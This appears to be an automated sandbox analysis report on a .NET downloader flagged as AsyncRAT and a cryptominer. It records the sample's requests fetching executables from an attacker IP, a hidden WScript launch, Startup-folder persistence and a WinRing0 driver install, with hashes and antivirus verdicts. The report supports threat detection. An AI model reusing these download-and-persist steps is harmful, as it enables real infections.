Summary | ZeroBOX

ntdw1.exe

Tags: AsyncRAT, Cryptocurrency_miner, Antivirus
Category: FILE
Machine: s1_win7_x6401
Started: April 24, 2021, 6 p.m.
Completed: April 24, 2021, 6:05 p.m.
Size: 11.0KB
Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5: 2cf6144870e0ba1a5290316435125321
SHA256: 59efa7f3af975532fe4da3d5653933fddb06fffa847190bc967c9c0ebfe10741
CRC32: 3DC89665
ssdeep: 192:A29BE9u+1nTN+qs9sdmXkC7iQIW1YPhzuHv9E/vhEJ0CT+lNK:3iu+d4qs9z0C7i9hzuHv9EXh4T+lN
PDB Path: C:\Users\JOHN\source\repos\WindowsApp1\WindowsApp1\obj\Debug\WindowsApp1.pdb
Yara
  • PE_Header_Zero - PE File Signature Zero
  • Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT
  • IsPE32 - (no description)
  • IsNET_EXE - (no description)
  • IsWindowsGUI - (no description)
  • HasDebugData - DebugData Check

IP Address Status Action
149.202.83.171 Active Moloch
164.124.101.2 Active Moloch
45.144.225.135 Active Moloch

API: IsDebuggerPresent
Arguments: (none)
Return: 0, Repeated: 0

API: IsDebuggerPresent
Arguments: (none)
Return: 0, Repeated: 0
pdb_path: C:\Users\JOHN\source\repos\WindowsApp1\WindowsApp1\obj\Debug\WindowsApp1.pdb

API: GlobalMemoryStatusEx
Arguments: (none)
Status: 1, Return: 1, Repeated: 0

suspicious_features: GET method with no useragent header, Connection to IP address
suspicious_request: GET http://45.144.225.135/csrss.exe
suspicious_features: Connection to IP address
suspicious_request: GET http://45.144.225.135/config.txt
suspicious_features: Connection to IP address
suspicious_request: GET http://45.144.225.135/notepad.exe
request: GET http://45.144.225.135/csrss.exe
request: GET http://45.144.225.135/config.txt
request: GET http://45.144.225.135/notepad.exe
Memory API calls (22). Every call below requests protection: 64 (PAGE_EXECUTE_READWRITE) and reports stack_dep_bypass: 0 and stack_pivoted: 0. For NtProtectVirtualMemory the size column is the length argument and allocation_type does not apply.

API                      pid   process_handle      base_address        size     allocation_type                 heap_dep_bypass  Status  Return  Repeated
NtAllocateVirtualMemory  1896  0xffffffff          0x006d0000          1966080  8192 (MEM_RESERVE)              0                1       0       0
NtAllocateVirtualMemory  1896  0xffffffff          0x00870000          4096     4096 (MEM_COMMIT)               1                1       0       0
NtProtectVirtualMemory   1896  0xffffffff          0x72741000          4096     -                               0                1       0       0
NtProtectVirtualMemory   1896  0xffffffff          0x72742000          4096     -                               0                1       0       0
NtAllocateVirtualMemory  1896  0xffffffff          0x00a40000          983040   8192 (MEM_RESERVE)              0                1       0       0
NtAllocateVirtualMemory  1896  0xffffffff          0x00af0000          4096     4096 (MEM_COMMIT)               1                1       0       0
NtAllocateVirtualMemory  1896  0xffffffff          0x00522000          4096     4096 (MEM_COMMIT)               1                1       0       0
NtAllocateVirtualMemory  1896  0xffffffff          0x00555000          4096     4096 (MEM_COMMIT)               1                1       0       0
NtAllocateVirtualMemory  1896  0xffffffff          0x0055b000          4096     4096 (MEM_COMMIT)               1                1       0       0
NtAllocateVirtualMemory  1896  0xffffffff          0x00557000          4096     4096 (MEM_COMMIT)               1                1       0       0
NtAllocateVirtualMemory  1896  0xffffffff          0x0053c000          4096     4096 (MEM_COMMIT)               1                1       0       0
NtAllocateVirtualMemory  1896  0xffffffff          0x006a0000          4096     4096 (MEM_COMMIT)               1                1       0       0
NtAllocateVirtualMemory  1896  0xffffffff          0x00546000          4096     4096 (MEM_COMMIT)               1                1       0       0
NtAllocateVirtualMemory  1896  0xffffffff          0x0052a000          4096     4096 (MEM_COMMIT)               1                1       0       0
NtAllocateVirtualMemory  1896  0xffffffff          0x0054a000          4096     4096 (MEM_COMMIT)               1                1       0       0
NtAllocateVirtualMemory  1896  0xffffffff          0x00547000          4096     4096 (MEM_COMMIT)               1                1       0       0
NtAllocateVirtualMemory  2256  0xffffffff          0x03820000          1916928  12288 (MEM_COMMIT|MEM_RESERVE)  0                1       0       0
NtAllocateVirtualMemory  2112  0xffffffffffffffff  0x0000000000380000  81920    12288 (MEM_COMMIT|MEM_RESERVE)  0                1       0       0
NtAllocateVirtualMemory  2112  0xffffffffffffffff  0x0000000002340000  131072   12288 (MEM_COMMIT|MEM_RESERVE)  0                1       0       0
NtAllocateVirtualMemory  2112  0xffffffffffffffff  0x0000000002ae0000  131072   12288 (MEM_COMMIT|MEM_RESERVE)  0                1       0       0
NtAllocateVirtualMemory  2112  0xffffffffffffffff  0x0000000002db0000  131072   12288 (MEM_COMMIT|MEM_RESERVE)  0                1       0       0
NtProtectVirtualMemory   1768  0xffffffff          0x72a52000          4096     -                               0                1       0       0
description: Tempbds.exe tried to sleep 222 seconds, actually delayed analysis time by 222 seconds
file: C:\Users\test22\AppData\Local\Tempbds.exe
cmdline: cmd.exe /C WScript "C:\ProgramData\LKBNMTFJgl\r.vbs"
API: CreateProcessInternalW
Arguments:
  thread_identifier: 1292
  thread_handle: 0x00000284
  process_identifier: 1240
  current_directory:
  filepath:
  track: 1
  command_line: cmd.exe /C WScript "C:\ProgramData\LKBNMTFJgl\r.vbs"
  filepath_r:
  stack_pivoted: 0
  creation_flags: 134217728 (CREATE_NO_WINDOW)
  inherit_handles: 0
  process_handle: 0x00000280
Status: 1, Return: 1, Repeated: 0
API: GetAdaptersAddresses
Arguments:
  flags: 15
  family: 0
Return: 111, Repeated: 0
API: InternetReadFile
Arguments:
  buffer: MZ ... This program cannot be run in DOS mode. ... Rich ... PE L ... .text ... .data ... .rsrc ... MSVBVM60.DLL (first bytes of a downloaded PE file; non-printable bytes omitted)
  request_handle: 0x00cc000c
Status: 1, Return: 1, Repeated: 0
API: Process32NextW (36 calls; every call has process_name: taskhost.exe, process_identifier: 1296, Return: 0, Repeated: 0; grouped by snapshot_handle)

snapshot_handle  calls
0x00000284       13
0x00000280       2
0x00000230       9
0x00000214       8
0x00000250       4
host: 45.144.225.135
file: C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url
API: CreateServiceW
Arguments:
  service_start_name:
  start_type: 3
  password:
  display_name: WinRing0_1_2_0
  filepath: C:\Windows\WinRing0x64.sys
  service_name: WinRing0_1_2_0
  filepath_r: C:\Windows\WinRing0x64.sys
  desired_access: 983551
  service_handle: 0x0000000000be7c80
  error_control: 1
  service_type: 1
  service_manager_handle: 0x0000000000be7ad0
Status: 1, Return: 12483712, Repeated: 0
file: C:\Windows\SysWOW64\wscript.exe
Antivirus             Detection
Elastic               malicious (high confidence)
Cynet                 Malicious (score: 100)
McAfee                RDN/Generic Downloader.x
Cylance               Unsafe
Sangfor               Trojan.Win32.Save.a
K7AntiVirus           Trojan-Downloader ( 005798a51 )
Alibaba               Trojan:Win32/Miner.d6f21ee3
K7GW                  Trojan-Downloader ( 005798a51 )
CrowdStrike           win/malicious_confidence_70% (W)
Arcabit               Trojan.Generic.D23109E6
Symantec              ML.Attribute.HighConfidence
ESET-NOD32            a variant of MSIL/TrojanDownloader.Small.CLG
APEX                  Malicious
Paloalto              generic.ml
Kaspersky             Trojan.Win32.Miner.auuln
BitDefender           Trojan.GenericKD.36768230
NANO-Antivirus        Trojan.Win32.Miner.iuhoru
ViRobot               Trojan.Win32.Z.Downloader.11264.A
MicroWorld-eScan      Trojan.GenericKD.36768230
Avast                 Win32:Trojan-gen
Ad-Aware              Trojan.GenericKD.36768230
Emsisoft              Trojan-Downloader.Small (A)
DrWeb                 Trojan.Siggen12.56619
Zillya                Trojan.Miner.Win32.12523
McAfee-GW-Edition     RDN/Generic Downloader.x
FireEye               Generic.mg.2cf6144870e0ba1a
Sophos                Mal/Generic-S
Ikarus                Win32.Outbreak
Avira                 TR/Downloader.Gen
Kingsoft              Win32.Troj.Undef.(kcloud)
Gridinsoft            Trojan.Win32.Downloader.sa
Microsoft             Backdoor:Win32/Bladabindi!ml
AegisLab              Trojan.Win32.Miner.4!c
ZoneAlarm             Trojan.Win32.Miner.auuln
GData                 Win32.Trojan-Downloader.Generic.M2KAVL
AhnLab-V3             Trojan/Win.Generic.C4387213
VBA32                 TScope.Trojan.MSIL
MAX                   malware (ai score=100)
Malwarebytes          Malware.AI.1417145416
TrendMicro-HouseCall  TrojanSpy.Win32.MALXMR.USMANDK21
Rising                Downloader.Small!8.B41 (CLOUD)
SentinelOne           Static AI - Malicious PE
eGambit               Unsafe.AI_Score_86%
Fortinet              Riskware/Miner
AVG                   Win32:Trojan-gen
Cybereason            malicious.f7bcbe
Panda                 Trj/Downloader.FUM